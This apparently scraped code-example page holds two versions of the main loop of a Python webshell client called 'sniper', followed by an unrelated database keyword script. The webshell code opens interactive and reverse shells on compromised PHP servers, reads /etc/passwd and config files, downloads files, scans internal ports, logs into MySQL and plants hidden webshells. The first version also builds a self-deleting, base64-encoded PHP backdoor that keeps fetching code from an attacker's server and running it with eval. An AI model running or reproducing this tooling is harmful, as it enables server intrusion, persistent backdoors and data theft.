Пример #1
0
def main():
    banner()
    if len(sys.argv) != 4:
        show_help()
        exit(1)
    url = sys.argv[1]
    method = sys.argv[2]
    password = sys.argv[3]
    webshell = WebShell(url, method, password)
    LOCAL_COMMAND_FLAG = True
    if not webshell.working:
        Log.error("The webshell cannot work...")
        exit(2)

    Log.info("recording this webshell to the log file...")
    with open("Webshell.txt", "a+") as f:
        log_content = "%s => %s => %s\n" % (url, method, password)
        f.write(log_content)

    main_help()

    while True:
        Log.context("sniper")
        context_fresh = raw_input("=>") or "h"
        context = string.lower(context_fresh)
        if context == "h" or context == "help" or context == "?":
            main_help()
        elif context == "sh" or context == "shell":
            shell = Shell(webshell)
            shell.interactive()
        elif context == "rsh" or context == "rshell":
            Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
            ip = raw_input("[IP] : (%s)" %
                           (get_ip_address())) or get_ip_address()
            port = raw_input("[PORT] : (8888)") or "8888"
            Log.info("Starting reverse shell (%s:%s)" % (ip, port))
            webshell.reverse_shell(ip, port)
        elif context == "p" or context == "print":
            webshell.print_info()
        elif context == "pv" or context == "php_version":
            Log.success(webshell.get_php_version())
        elif context == "kv" or context == "kernel_version":
            Log.success(webshell.get_kernel_version())
        elif context == "c" or context == "config":
            Log.info("Detacting config files...")
            webshell.get_config_file()
        elif context == "fwd":
            webshell.get_writable_directory()
        elif context == "gdf":
            webshell.get_disabled_functions()
        elif context == "fwpf":
            webshell.get_writable_php_file()
        elif context == "fsb":
            webshell.get_suid_binaries()
        elif context == "setr":
            LOCAL_COMMAND_FLAG = False
        elif context == "setl":
            LOCAL_COMMAND_FLAG = True
        elif context == "dla":
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            args = raw_input("Please custom find args (%s) : " %
                             (" -size 500k")) or " -size 500k"
            Log.info("Using command : find %s %s" % (path, args))
            webshell.download_advanced(path, args)
        elif context == "dl":
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            if not webshell.file_exists(path):
                Log.error("The file [%s] is not exists on the server!" %
                          (path))
                continue
            if webshell.is_directory(path):
                Log.info(
                    "The target file is a directory, using recursion download..."
                )
                filename_filter = raw_input("Input --name '%s' : " %
                                            ("*.php")) or "*.php"
                webshell.download_recursion(path, filename_filter)
            else:
                #filename = path.split("/")[-1]
                #local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
                # Log.info("Using root path : [%s] to save!" % (local_path))
                Log.info(
                    "The target file is a single file, starting download...")
                webshell.download(path, path)
        elif context == "ps":
            hosts = raw_input(
                "Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
            if not "/" in hosts:
                Log.error(
                    "Please use the format IP/MASK , if want to scan a single host , set MASK=32"
                )
                continue
            ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
                              ) or "21,22,25,80,443,445,3389"
            webshell.port_scan(hosts, ports)
        elif context == "aiw":
            default_filename = random_string(0x10, string.letters)
            default_password = md5(
                md5("%s%s%s" % (salt, default_filename, salt)))
            filename = raw_input("Filename (.%s.php): " %
                                 (default_filename)) or (".%s.php" %
                                                         (default_filename))
            password = raw_input("Password (%s): " %
                                 (default_password)) or ("%s" %
                                                         (default_password))
            webshell.auto_inject_webshell(filename, password)
        elif context == "aimw":
            default_filename = random_string(0x10, string.letters)
            default_password = md5(
                md5("%s%s%s" % (salt, default_filename, salt)))
            filename = raw_input("Filename (.%s.php): " %
                                 (default_filename)) or (".%s.php" %
                                                         (default_filename))
            password = raw_input("Password (%s): " %
                                 (default_password)) or ("%s" %
                                                         (default_password))
            webshell.auto_inject_memery_webshell(filename, password)
        elif context == "fr":
            Log.info("Starting flag reaper...")
            webserver_host = raw_input("[IP] (%s) : " %
                                       (get_ip_address())) or get_ip_address()
            webserver_port = int(raw_input("[PORT] (80) : ") or "80")
            filename = ".%s.php" % (random_string(0x10, string.letters))
            file_content = "ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while(true){$code = file_get_contents('http://%s:%d/code.txt');eval($code);sleep(5);}" % (
                webserver_host, webserver_port)
            Log.info("Temp memory phpfile : %s" % (file_content))
            Log.info("Encoding phpfile...")
            file_content = '<?php unlink(__FILE__);eval(base64_decode("%s"));?>' % (
                file_content.encode("base64").replace("\n", ""))
            Log.info("Final memory phpfile : %s" % (file_content))
            result = webshell.auto_inject_flag_reaper(filename, file_content)
            if result:
                Log.success(
                    "Please check the web server(%s:%d) log to get your flag!"
                    % (webserver_host, webserver_port))
                Log.info("Tips : tail -f /var/log/apache2/access.log")
            else:
                Log.error("Starting flag reaper failed!")
        elif context == "r" or context == "read":
            filepath = raw_input(
                "Input file path (/etc/passwd) : ") or "/etc/passwd"
            webshell.read_file(filepath)
        elif context == "db" or context == "database":
            ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
            username = raw_input("Username (root): ") or "root"
            password = raw_input("Password (root): ") or "root"
            Log.info("Creating connection by [%s:%s] to [%s]..." %
                     (username, password, ip))
            mysql_connection = Mysql(webshell, ip, username, password)
            if not mysql_connection.function:
                Log.error("The target server cannot support mysql!")
                continue
            if not mysql_connection.connection_flag:
                Log.error("Connection failed!")
                continue
            Log.success("Connection success!")
            if mysql_connection.function != "":
                Log.success("Entering database server interactive mode...")
                mysql_connection.interactive()
            else:
                Log.error("No supported database function!")
        elif context == "q" or context == "quit" or context == "exit":
            Log.info("Quiting...")
            break
        else:
            Log.error("Unsupported function!")
            if LOCAL_COMMAND_FLAG == True:
                Log.info("Executing command on localhost...")
                os.system(context_fresh)
            else:
                Log.info("Executing command on target server...")
                webshell.auto_exec_print(context_fresh)
Пример #2
0
def main():
    banner()
    if len(sys.argv) != 4:
        show_help()
        exit(1)
    url = sys.argv[1]
    method = sys.argv[2]
    password = sys.argv[3]
    webshell = WebShell(url, method, password)
    LOCAL_COMMAND_FLAG = True
    if not webshell.working:
        Log.error("The webshell cannot work...")
        exit(2)

    main_help()

    while True:
        Log.context("sniper")
        context_fresh = raw_input("=>") or "h"
        context = string.lower(context_fresh)
        if context == "h" or context == "help" or context == "?":
            main_help()
        elif context == "sh" or context == "shell":
            shell = Shell(webshell)
            shell.interactive()
        elif context == "rsh" or context == "rshell":
            Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
            ip = raw_input("[IP] : (%s)" %
                           (get_ip_address())) or get_ip_address()
            port = raw_input("[PORT] : (8888)") or "8888"
            Log.info("Starting reverse shell (%s:%s)" % (ip, port))
            webshell.reverse_shell(ip, port)
        elif context == "p" or context == "print":
            webshell.print_info()
        elif context == "pv" or context == "php_version":
            webshell.get_php_version()
        elif context == "kv" or context == "kernel_version":
            webshell.get_kernel_version()
        elif context == "c" or context == "config":
            Log.info("Detacting config files...")
            webshell.get_config_file()
        elif context == "fwd":
            webshell.get_writable_directory()
        elif context == "gdf":
            webshell.get_disabled_functions()
        elif context == "fwpf":
            webshell.get_writable_php_file()
        elif context == "fsb":
            webshell.get_suid_binaries()
        elif context == "setr":
            LOCAL_COMMAND_FLAG = False
        elif context == "setl":
            LOCAL_COMMAND_FLAG = True
        elif context == "dla":
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            args = raw_input("Please custom find args (%s) : " %
                             (" -size 500k")) or " -size 500k"
            Log.info("Using command : find %s %s" % (path, args))
            webshell.download_advanced(path, args)
        elif context == "dl":
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            if not webshell.file_exists(path):
                Log.error("The file [%s] is not exists on the server!" %
                          (path))
                continue
            if webshell.is_directory(path):
                Log.info(
                    "The target file is a directory, using recursion download..."
                )
                filename_filter = raw_input("Input --name '%s' : " %
                                            ("*.php")) or "*.php"
                webshell.download_recursion(path, filename_filter)
            else:
                #filename = path.split("/")[-1]
                #local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
                # Log.info("Using root path : [%s] to save!" % (local_path))
                Log.info(
                    "The target file is a single file, starting download...")
                webshell.download(path, path)
        elif context == "ps":
            hosts = raw_input(
                "Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
            if not "/" in hosts:
                Log.error(
                    "Please use the format IP/MASK , if want to scan a single host , set MASK=32"
                )
                continue
            ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
                              ) or "21,22,25,80,443,445,3389"
            webshell.port_scan(hosts, ports)
        elif context == "aiw":
            default = random_string(0x10, string.letters)
            filename = raw_input("Filename (.%s.php): " %
                                 (default)) or (".%s.php" % (default))
            password = raw_input("Password (%s): " % (default)) or ("%s" %
                                                                    (default))
            webshell.auto_inject_webshell(filename, password)
        elif context == "r" or context == "read":
            filepath = raw_input(
                "Input file path (/etc/passwd) : ") or "/etc/passwd"
            webshell.read_file(filepath)
        elif context == "db" or context == "database":
            ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
            username = raw_input("Username (root): ") or "root"
            password = raw_input("Password (root): ") or "root"
            Log.info("Creating connection by [%s:%s] to [%s]..." %
                     (username, password, ip))
            mysql_connection = Mysql(webshell, ip, username, password)
            if not mysql_connection.function:
                Log.error("The target server cannot support mysql!")
                continue
            if not mysql_connection.connection_flag:
                Log.error("Connection failed!")
                continue
            Log.success("Connection success!")
            if mysql_connection.function != "":
                Log.success("Entering database server interactive mode...")
                mysql_connection.interactive()
            else:
                Log.error("No supported database function!")
        elif context == "q" or context == "quit" or context == "exit":
            Log.info("Quiting...")
            break
        else:
            Log.error("Unsupported function!")
            if LOCAL_COMMAND_FLAG == True:
                Log.info("Executing command on localhost...")
                os.system(context_fresh)
            else:
                Log.info("Executing command on target server...")
                webshell.auto_exec_print(context_fresh)
Пример #3
0
import os, sys
# 配置环境变量
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, BASE_PATH)
from core.db import Mysql
from core.df import Df
# 执行
if __name__ == '__main__':
    kw = '网络工程'
    db = Mysql()
    df = Df(db.select_key(kw), kw=kw)
    df.write()